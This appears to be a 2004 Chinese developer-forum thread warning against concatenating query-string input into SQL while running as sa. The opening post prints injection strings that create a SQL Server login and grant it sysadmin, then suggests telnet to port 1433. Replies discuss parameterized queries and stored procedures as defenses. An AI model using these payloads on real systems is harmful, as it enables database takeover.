62,074
社区成员
发帖
与我相关
我的任务
分享[斑竹置顶]你知道 "select .. where name = "+ Request.QueryString["name"]的后果?
很多人用数据库发布的时候都用的sa,再加上"select .. where name = "+ Request.QueryString["name"]这样的操作,我们来看看结果是怎么样?!
[篇幅问题,具体命令自己查查]
把Request.QueryString["name"]的值改为:
1. ;exec master.dbo.sp_addlogin Test, Test, master-- // 建立用户
2. ;EXEC master.dbo.sp_addsrvrolemember 'Test', 'sysadmin'-- // 将用户test提升为管理员组
用 telnet www.***.com 1433 查看是否可以远程登陆,如果可以嘿嘿..
不可以呢?
向下看
[篇幅问题,具体命令自己查查]
把Request.QueryString["name"]的值改为:
1. ;exec master.dbo.sp_addlogin Test, Test, master-- // 建立用户
2. ;EXEC master.dbo.sp_addsrvrolemember 'Test', 'sysadmin'-- // 将用户test提升为管理员组
用 telnet www.***.com 1433 查看是否可以远程登陆,如果可以嘿嘿..
不可以呢?
向下看
...全文
请发表友善的回复…
发表回复
reddg 2004-07-01
- 打赏
- 举报
up
海大富运动 2004-07-01
- 打赏
- 举报
像这种问题,有什么高级编程的书可以看看吗
海大富运动 2004-07-01
- 打赏
- 举报
请问:什么是 注入式攻击!呵呵,小菜鸟的问题,大家别笑
hunterzhi 2004-07-01
- 打赏
- 举报
强
BillTuan 2004-07-01
- 打赏
- 举报
up
goody9807 2004-07-01
- 打赏
- 举报
收藏
nameldw 2004-07-01
- 打赏
- 举报
学习
guying999 2004-07-01
- 打赏
- 举报
呵呵,这叫注入式攻击,可以通过使用存储过程,或者过滤掉一些危险字符来防止
langmafeng 2004-07-01
- 打赏
- 举报
用参数
melonlee 2004-07-01
- 打赏
- 举报
学习~!!!!!
bjy_ly 2004-07-01
- 打赏
- 举报
我通常都是屏蔽“'”
Piyongcai 2004-06-30
- 打赏
- 举报
收藏!
Raimond 2004-06-30
- 打赏
- 举报
收藏!
vzxq 2004-06-30
- 打赏
- 举报
支持 use procedure
little119 2004-06-30
- 打赏
- 举报
学习!收藏!!!!
menuvb 2004-06-30
- 打赏
- 举报
"select .. where name = "+ Request.QueryString["name"]
主要就是存在SQL注入式攻击了,不过如果使用存储过程
该存储过程的输入参数=Request.QueryString["name"] 就不会存在这个问题了。
主要就是存在SQL注入式攻击了,不过如果使用存储过程
该存储过程的输入参数=Request.QueryString["name"] 就不会存在这个问题了。
smilex 2004-06-30
- 打赏
- 举报
to:aivii(龍)
那是不是在登陆时做限制就行了呢????
那是不是在登陆时做限制就行了呢????
smilex 2004-06-30
- 打赏
- 举报
学习
happyjun2000 2004-06-30
- 打赏
- 举报
收藏
stpangpang 2004-06-30
- 打赏
- 举报
使用 SqlParameter 参数 如果不是怕麻烦,全部用proc
---
aivii(龍) 你的第 2 ,3个方法 太强了pf
---
aivii(龍) 你的第 2 ,3个方法 太强了pf
加载更多回复(27)
